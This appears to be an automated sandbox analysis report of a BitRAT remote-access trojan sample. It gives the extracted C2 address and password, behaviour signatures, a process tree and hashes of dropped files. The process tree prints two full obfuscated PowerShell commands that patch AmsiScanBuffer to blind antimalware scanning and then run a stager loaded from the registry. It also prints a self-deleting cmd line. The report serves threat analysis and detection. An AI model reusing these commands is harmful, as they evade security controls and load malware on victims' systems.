Analysis
-
max time kernel
155s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
29-01-2024 21:04
General
-
Target
80dcd56f6d8e3324d715736b66858795.exe
-
Size
7.9MB
-
MD5
80dcd56f6d8e3324d715736b66858795
-
SHA1
5b94991f56910b4bac99bef952ce88c740883b4d
-
SHA256
2a5860280179b24de91f70165fb736afa5947cefb5c33c63202c7d8c5d00d1d0
-
SHA512
d9e0d10a5c11ec3e3ccb62e448f9be9c6287ae118cc7c84f2012999b35836688946dd3a05b046daf370870fadcec2f690850f25f5811400572639de0554e135b
-
SSDEEP
196608:LK8mrs8c1/ohqLBhTZEIN+8y2CVoW1a+QKON:tmrsChqNby2CB1a+
Score
10/10
Malware Config
Extracted
Family
bitrat
Version
1.38
C2
178.20.40.235:5555
Attributes
-
communication_password
cc86a50fb8f3c4840cb346a0829f64a2
-
tor_process
tor
Signatures
-
BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 25 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{29ee1cc6-5340-4ac1-810a-27bd7035b933}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{de891a68-cce4-46ea-8cea-e32fbe04ef3a}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:SvFBkGvvqaNK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WAZySZdQDgdNJN,[Parameter(Position=1)][Type]$hhlxguHdRn)$LevuJyCmaTl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LevuJyCmaTl.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$WAZySZdQDgdNJN).SetImplementationFlags('Runtime,Managed');$LevuJyCmaTl.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$hhlxguHdRn,$WAZySZdQDgdNJN).SetImplementationFlags('Runtime,Managed');Write-Output $LevuJyCmaTl.CreateType();}$HEcBJhYsIRWxh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XNJcDCYpqnMoGl=$HEcBJhYsIRWxh.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vRaiGxMGPNqETvYRHvb=SvFBkGvvqaNK @([String])([IntPtr]);$rzJcSjnxUkTaVFdyXIPUts=SvFBkGvvqaNK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PWDXlFkKnVf=$HEcBJhYsIRWxh.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$diOhohuAIUZtSU=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$PWDXlFkKnVf,[Object]('Load'+'LibraryA')));$NARBTZlcHnXnyXhrQ=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$PWDXlFkKnVf,[Object]('Vir'+'tual'+'Pro'+'tect')));$HTmLMzr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($diOhohuAIUZtSU,$vRaiGxMGPNqETvYRHvb).Invoke('a'+'m'+'si.dll');$jkaVYFxJXNGpOuXdU=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$HTmLMzr,[Object]('Ams'+'iSc'+'an'+'Buffer')));$EpFJhcMLjy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NARBTZlcHnXnyXhrQ,$rzJcSjnxUkTaVFdyXIPUts).Invoke($jkaVYFxJXNGpOuXdU,[uint32]8,4,[ref]$EpFJhcMLjy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jkaVYFxJXNGpOuXdU,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NARBTZlcHnXnyXhrQ,$rzJcSjnxUkTaVFdyXIPUts).Invoke($jkaVYFxJXNGpOuXdU,[uint32]8,0x20,[ref]$EpFJhcMLjy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DghJHHMgzIMm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mYnEObHFVUitkB,[Parameter(Position=1)][Type]$ZZXxGuMCZh)$ptFZaceDNym=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ptFZaceDNym.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$mYnEObHFVUitkB).SetImplementationFlags('Runtime,Managed');$ptFZaceDNym.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZZXxGuMCZh,$mYnEObHFVUitkB).SetImplementationFlags('Runtime,Managed');Write-Output $ptFZaceDNym.CreateType();}$pxoXQYImIWJTe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$TBCmkQbPVORBQt=$pxoXQYImIWJTe.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$epRVEsNAIKeWNIDcsaO=DghJHHMgzIMm @([String])([IntPtr]);$qgGtancAakPiltSyBQwbXs=DghJHHMgzIMm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XypoUROdUvY=$pxoXQYImIWJTe.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$nlABNPBbgPiuJj=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$XypoUROdUvY,[Object]('Load'+'LibraryA')));$dshhBhIONdcTosVzT=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$XypoUROdUvY,[Object]('Vir'+'tual'+'Pro'+'tect')));$swJRaOC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nlABNPBbgPiuJj,$epRVEsNAIKeWNIDcsaO).Invoke('a'+'m'+'si.dll');$QBHFTaYOxjvmuSxUb=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$swJRaOC,[Object]('Ams'+'iSc'+'an'+'Buffer')));$uWlwBSaJkR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dshhBhIONdcTosVzT,$qgGtancAakPiltSyBQwbXs).Invoke($QBHFTaYOxjvmuSxUb,[uint32]8,4,[ref]$uWlwBSaJkR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QBHFTaYOxjvmuSxUb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dshhBhIONdcTosVzT,$qgGtancAakPiltSyBQwbXs).Invoke($QBHFTaYOxjvmuSxUb,[uint32]8,0x20,[ref]$uWlwBSaJkR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exe"C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exe"C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com -Count 2 -BufferSize 128 -Delay 14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\$77.Install.exe"C:\Users\Admin\AppData\Local\Temp\$77.Install.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\80dcd56f6d8e3324d715736b66858795.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 1004⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 9004⤵
- Runs ping.exe
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 516 -s 3722⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 994431210eadda20772261f119916d7b RVQ/bmb0LEinsBU/vyMb3g.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 496 -p 4080 -ip 40802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4080 -s 7122⤵
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2AC.tmp.csvFilesize
36KB
MD5b0dda67d2d471f21db912f0dab2ac01e
SHA1bd9e3de3accc0e55da1bc96c17c8b720e41f8ed3
SHA256dd643e576c1b226aa6c0b6688a8c1e5ff545e3713b99475ee7dd823b420d0030
SHA51265ce262cca48b759bfc8e83052f9d26fb8ed7dc3ac48996cde140eaf95cccc65e7003acc5d7e1b523c0ed893e40719dd67c4e01e3b41326a13146b9b943cd142
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD32A.tmp.txtFilesize
13KB
MD530aecb6398181bd55367e682b18a9575
SHA164a033f55c1ad0c003a447d439f420658412e03b
SHA25602bab7447f780a26a4c03ac4204311e40aeb9b29f5f63e6350297ba16f50e45b
SHA512fbd7b2e31bfdeeda0602157da2567f145025dab4599205856e9b36a0f59199a4b971538924251a0a565d38227a32696e177da31f69e3092d1d2f40eca923d7e3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD527fdb1beb89b56345e585d480be3026b
SHA12626e41ca27668518d01c04e1579f77027ff31a1
SHA256ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2
SHA512bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53003448ee73abf14d5c8011a37c40600
SHA1b88e9cdbae2e27a25f0858fc0b6d79533fb160d8
SHA256ae448d99735879ecee1dc3088c8f7553ebff461b96172d8f3cb5ff2fa2a12d4a
SHA5120fe52614eec6d75a265ae380aaa1eb153bc35a1baae4d118637798575169d9dba5ad751efab5d7f5dbe9764bfb96e9ae76577a3487429a3383b5b08d5402fe3a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55161e9d6b9b677b7af6e5bb11a361b91
SHA19fe0a04c2bb86467b9aa584c78db4fc7eccfdd42
SHA256addb0aa038e121d21d7b4bd4ba49316c05294a582cb430eb37ce3925324bd3d0
SHA51295b4a85b4240145d35f1f14bc07ee87b597d484935599f898074be16a7bfcc6fdb36e31e5afedac1c83bdbcbf402c40a3573f2b3512ba521f3ad29fd503f7749
-
C:\Users\Admin\AppData\Local\Temp\$77.Install.exeFilesize
311KB
MD5964c5fffcba7f353cf12d09675a46de6
SHA19462c1249ef86c39da01b7480f1b2ce4a2a1a7b9
SHA256b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed
SHA512ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565
-
C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exeFilesize
6.2MB
MD5ad5caef685124f26f817e265827a7069
SHA1a8680e58ddbfa999614cb2ccf54552fe5efbd4a4
SHA25681997cab9f886b0e2dea5c6e864b5b0709e2f358d8411dd55e04677f4c57449c
SHA512cafe997681594e70d5cd2c07be0379aaa90c5cf3bf45b88ba442c921e7c59248077e25a9925f19f1dcfefab09ca33d2c4a5adfdefc12989b3e7c219dcabaea6a
-
C:\Users\Admin\AppData\Local\Temp\$77.WWI Provider Host.exeFilesize
6.2MB
MD54794de810c83ee1de52d08431f5d4766
SHA1170b1249ed403ac07df5f44bdfd5bb48abd4e5ac
SHA256e1cc58537e257bda1dc8204b4093d76a6d34187a982f074a0e4c15f202301af8
SHA51274f387a196a3af1fd4a658b39bd40dd6b8d8ab241a59045e15ee620e145667ffc38fe2106896620126261c4164042d4bce9a0bd5cfebb29c4b72bc24b8f6d612
-
C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exeFilesize
1.4MB
MD574a214d6fd715df8626541e99fc151f2
SHA16e298b0f0e7b1d740312afc0a625336298f5ab49
SHA2569f54a69141746bdac20bd3f51d3bdcb4002dcb07b1faf925a6310230fc0d2321
SHA512902b292743547a6f31e962230c5fd4253e3f1183bda5c583d382ebbb3bb39b7ae8e7c95236226ae941c58fbfaf9eb960bea8f181d437ed402017a2bfef18025a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v4yn2u4q.zy0.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
